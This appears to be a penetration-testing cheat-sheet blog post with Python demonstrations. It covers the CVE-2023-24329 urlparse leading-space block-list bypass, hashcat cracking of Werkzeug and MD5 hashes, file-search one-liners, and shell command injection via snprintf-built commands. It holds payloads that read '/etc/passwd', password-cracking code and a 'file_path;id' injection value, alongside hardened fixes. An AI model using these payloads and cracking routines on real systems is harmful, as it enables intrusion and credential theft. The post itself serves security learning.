CVE-2023-24329

Python's urllib.parse (urlsplit / urlparse) before the fix in 3.11.4 (backported to the maintained 3.7 to 3.10 releases) does not strip leading blank characters, so a URL that starts with a space is parsed with an empty scheme and an empty host. A block list that checks the parsed scheme or host therefore lets the URL through, while the code that fetches it (urllib.request, requests) strips the whitespace and reaches the real target.

To bypass: simply put a space before the blocked URL

e.g. given the following block list

blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

the payload can be

"    http://example.com/"
"    file:///etc/passwd"
"    file:///proc/self/cmdline"
"    ftp://<username>:<password>@<domain-name>/<file-name>"

The file:// and ftp:// payloads only pay off when the fetching side supports those schemes (urllib.request.urlopen does, requests does not). The fix strips WHATWG C0 control characters and spaces before parsing, so on a patched interpreter the leading space is removed and the check sees the real scheme and host.
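
Added example (not from the original notes) that puts the two halves of the bug side by side: a block-list check of the kind the CVE defeats, what urllib.request would really open for the same string, and a check hardened the way the upstream fix works (strip C0 controls and spaces, then only accept http(s) with a host). The block list is the one above; the payloads and the function names are constructed here. Whether the vulnerable check lets the spaced URL through depends on the interpreter: unpatched versions return an empty scheme and host, patched ones strip the space first, and interpreter_is_patched() reports which one you are on.

```python
import sys
from urllib.parse import urlsplit
from urllib.request import Request

# Block list from the notes above
BLOCKED_LIST = [
    "http://example.com/",
    "http://example2.com/",
]

# The characters the CVE-2023-24329 fix strips before parsing
# (WHATWG "C0 control or space": U+0000 to U+001F and U+0020)
C0_CONTROL_OR_SPACE = "".join(chr(c) for c in range(0x21))


def vulnerable_is_blocked(url: str) -> bool:
    """Block-list check of the kind the CVE defeats: trust urlsplit() to
    recover scheme and host, rebuild the origin and compare it with the list.
    On an unpatched interpreter a leading space leaves scheme and netloc
    empty, the origin becomes '://' and nothing in the list matches."""
    parts = urlsplit(url)
    origin = f"{parts.scheme}://{parts.netloc}/"
    return origin in BLOCKED_LIST


def hardened_is_blocked(url: str) -> bool:
    """Same list, but strip what the patched urlsplit() strips, accept only
    http(s) with a host, and compare the normalised (lower-cased, port and
    userinfo dropped) origin."""
    parts = urlsplit(url.strip(C0_CONTROL_OR_SPACE))
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return True  # file://, ftp://, schemeless and bare paths never pass
    return f"{parts.scheme.lower()}://{parts.hostname}/" in BLOCKED_LIST


def fetcher_target(url: str) -> str:
    """What urllib.request would actually open: Request() strips the
    surrounding whitespace, so the spaced URL reaches the real host."""
    return Request(url).full_url


def interpreter_is_patched() -> bool:
    """True when this interpreter's urlsplit() already strips leading blanks."""
    return urlsplit(" http://example.com/").scheme == "http"


def demo(payloads=None) -> dict:
    """Run every check against the payloads from the notes (constructed here)."""
    payloads = payloads or ["    http://example.com/", "    file:///etc/passwd"]
    return {
        p: {
            "vulnerable_check_blocks": vulnerable_is_blocked(p),
            "hardened_check_blocks": hardened_is_blocked(p),
            "fetcher_would_request": fetcher_target(p),
        }
        for p in payloads
    }


if __name__ == "__main__":
    print(f"Python {sys.version.split()[0]}, urlsplit patched: {interpreter_is_patched()}")
    for url, result in demo().items():
        print(repr(url), result)
```

fetcher_target() only builds the Request object, it does not open anything, so the block is safe to run anywhere; the point it makes is that the string the block list saw and the URL the client goes to are not the same string.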

Convert an OpenSSH private key to a PEM (RSA) private key

ssh-keygen rewrites the key file in place, so work on a copy: -p changes the passphrase, -N "" makes the new passphrase empty, and -m pem writes the traditional PEM container (-----BEGIN RSA PRIVATE KEY-----) that older libraries and tools expect instead of the OpenSSH format (-----BEGIN OPENSSH PRIVATE KEY-----)

> ssh-keygen -p -N "" -m pem -f private.key
Enter old passphrase: <enter-passphrase>
Key has comment '<comment>'
Your identification has been saved with the new passphrase.

The old passphrase can also be supplied non-interactively with -P <passphrase>. Only RSA, DSA and ECDSA keys have a legacy PEM form; an Ed25519 key is written in the OpenSSH format regardless of -m.

Cracking hashes

  • Python Werkzeug SHA256 (hashcat mode 30120): the stored value has the form sha256$<salt>$<hex digest>, where the digest is HMAC-SHA256 keyed with the salt over the password

30120    Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt))    sha256$70108387805$8b9472281c36c3a693703de0

To crack

> hashcat -m 30120 hash_file wordlist_file

  • MD5 given partial plaintext: suppose there is an md5 hash and the plaintext is partially known, here the prefix PLAINTEXT followed by three unknown characters

> hashcat hash_file -a 3 -m 0 -1 ?l?u?d?s PLAINTEXT?1?1?1

-a 3 is the mask attack, -1 ?l?u?d?s defines custom charset ?1 as lower, upper, digits and specials (95 characters), and every ?1 in the mask is one unknown position while the other characters are fixed. If the number of missing characters is unknown, add --increment (and --increment-min to skip the short lengths); a literal ? in the known part must be written as ??.
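
Added example (not from the original notes, and not hashcat's own code) that does the same work as the two hashcat commands above in plain Python, so the hash format and the mask semantics can be checked offline: a Werkzeug sha256$salt$digest verifier with a dictionary loop, and a mask expander that understands ?l ?u ?d ?s, custom ?1..?4 charsets and the ?? escape, driving an md5 brute force over the unknown positions. The salt is the one from the example hash above; the passwords and the wordlist are constructed here.

```python
import hashlib
import hmac
import itertools
import string

# hashcat's built-in charsets; ?s is every printable ASCII special plus space
BUILTIN_CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": string.punctuation + " ",
}


def werkzeug_sha256(password: str, salt: str) -> str:
    """Werkzeug's legacy 'sha256$<salt>$<digest>' value (hashcat mode 30120):
    HMAC-SHA256 keyed with the salt over the password, hex encoded."""
    digest = hmac.new(salt.encode(), password.encode(), hashlib.sha256).hexdigest()
    return f"sha256${salt}${digest}"


def crack_werkzeug_sha256(stored: str, wordlist):
    """Dictionary attack, the work `hashcat -m 30120 hash_file wordlist_file` does."""
    method, salt, _digest = stored.split("$", 2)
    if method != "sha256":
        raise ValueError(f"unsupported Werkzeug method {method!r}")
    for candidate in wordlist:
        if werkzeug_sha256(candidate, salt) == stored:
            return candidate
    return None


def expand_mask(mask: str, custom=None) -> list:
    """Turn a hashcat mask into one alphabet per position: ?l ?u ?d ?s are
    built-ins, ?1..?4 are the custom charsets given with -1..-4, ?? is a
    literal '?', and any other character is fixed (known plaintext)."""
    custom = custom or {}
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            if key == "?":
                positions.append("?")
            elif key in BUILTIN_CHARSETS:
                positions.append(BUILTIN_CHARSETS[key])
            elif key in custom:
                positions.append(custom[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def expand_charset(spec: str) -> str:
    """Resolve a -1 style definition such as '?l?u?d?s' into its characters."""
    return "".join(expand_mask(spec))


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5_mask(target: str, mask: str, custom=None):
    """Mask attack, the work `hashcat hash_file -a 3 -m 0 -1 ?l?u?d?s PLAINTEXT?1?1?1`
    does: fixed mask characters are the known plaintext, each ?1 is brute-forced."""
    for combo in itertools.product(*expand_mask(mask, custom)):
        candidate = "".join(combo)
        if md5_hex(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed samples: salt from the example hash above, passwords chosen here
    stored = werkzeug_sha256("letmein", "70108387805")
    print(stored, "->", crack_werkzeug_sha256(stored, ["123456", "password", "letmein"]))
    charset1 = {"1": expand_charset("?l?u?d?s")}
    print(crack_md5_mask(md5_hex("Password1!"), "Passwor?1?1?1", charset1))
```

Three unknown positions over 95 characters is under a million candidates, which is why the partial-plaintext mask is cheap; each extra ?1 multiplies the work by 95, which is the point at which you reach for hashcat's GPU path rather than a script like this.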

Useful search methods

  • Find files modified since 2024-04-01 and exclude some paths (-newermt compares the modification time with the given date; the excluded trees are the pseudo filesystems and package-managed paths that would otherwise drown the result. -not -path still walks into those directories and only filters them out of the output; -prune is the faster way to skip them entirely)
> find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
  • Find files owned by a user (combine with -newermt to narrow it down to what that user touched recently)
> find / -type f -user <username> 2>/dev/null
  • grep all files for a keyword under a folder even if they are compressed (zgrep decompresses gzip files on the fly and passes uncompressed files through unchanged, so the glob can be widened to a mixed set of rotated logs)
> zgrep -i keyword /file/path/*.gz

cmd injection

A safe use of snprintf: the format string is fixed and the write is bounded by sizeof buf, so neither a format-string bug nor an overflow is possible

snprintf(buf, sizeof buf, "%s", argv[1]);

The same call is no safer when the format string is a command line and buf is afterwards handed to system() or popen(): the shell parses buf, so argv[1] can append its own command with ; | && $( ) or backticks, and the snprintf bound does nothing to stop it

snprintf(buf, sizeof(buf), "cmd -i %s", argv[1]);

# e.g argv[1]: file_path;<cmd>

The fix is to stop building a command string at all: exec the program with an argv array (execve / posix_spawn) so the user value arrives as a single argument, or, if a shell really is unavoidable, validate the value against an allow list of characters before it is formatted in.
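
Added example (not from the original notes) that reproduces the behaviour of the C snippet with Python's subprocess so the outcome can be observed: echo stands in for the cmd -i program, the command string is built the way snprintf builds it, and the same argument is then run through a shell (the system() / popen() path), as an argv vector, and through the shell again with shlex.quote applied. Assumes a POSIX system with /bin/sh, echo and id on PATH; the argument file_path;id is constructed here.

```python
import shlex
import subprocess


def build_command(program: str, user_arg: str) -> str:
    """Same thing snprintf(buf, sizeof buf, "cmd -i %s", argv[1]) does: the
    format is fixed, so the formatting itself is safe, but the result is a
    shell command line with untrusted text spliced into it."""
    return f"{program} {user_arg}"


def run_via_shell(cmdline: str) -> str:
    """Vulnerable path: hand the assembled string to a shell, which is what
    system(), popen() and subprocess with shell=True do."""
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def run_as_argv(program: str, user_arg: str) -> str:
    """Hardened path: exec the program with an argument vector. No shell ever
    tokenises user_arg, so ';', '|' and '$(...)' are plain characters."""
    return subprocess.run([program, user_arg], capture_output=True, text=True).stdout


def run_via_shell_quoted(program: str, user_arg: str) -> str:
    """When a shell is unavoidable, quote the argument so it stays one word."""
    return run_via_shell(f"{program} {shlex.quote(user_arg)}")


def shell_injects(user_arg: str = "file_path;id") -> bool:
    """True when the injected `id` really ran: the output is 'file_path' from
    echo followed by 'uid=' from id on the next line."""
    out = run_via_shell(build_command("echo", user_arg))
    return out.startswith("file_path\nuid=")


if __name__ == "__main__":
    arg = "file_path;id"
    print("shell  :", repr(run_via_shell(build_command("echo", arg))))
    print("argv   :", repr(run_as_argv("echo", arg)))
    print("quoted :", repr(run_via_shell_quoted("echo", arg)))
```

The argv form is the one to reach for: it removes the shell from the picture instead of trying to out-escape it, and it also defeats payloads that shlex.quote cannot help with in practice, such as an argument that starts with - and is read by the target program as an option.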

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack